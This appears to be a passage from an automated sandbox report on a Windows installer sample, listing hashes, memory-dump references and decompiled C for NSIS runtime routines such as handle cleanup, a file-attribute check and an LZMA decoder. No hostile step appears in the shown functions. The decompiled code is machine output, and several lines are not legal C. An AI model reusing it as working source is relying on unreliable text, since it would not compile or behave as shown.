Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\nsmF994.tmp\\", 7); // executed
				return _t4;
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c60
0x00403c66

APIs

CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C37
CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\nsmF994.tmp\, xrefs: 00403C5B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsmF994.tmp\
API String ID: 2962429428-3946611616
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x004060a8
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0,00000000), ref: 00406098
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
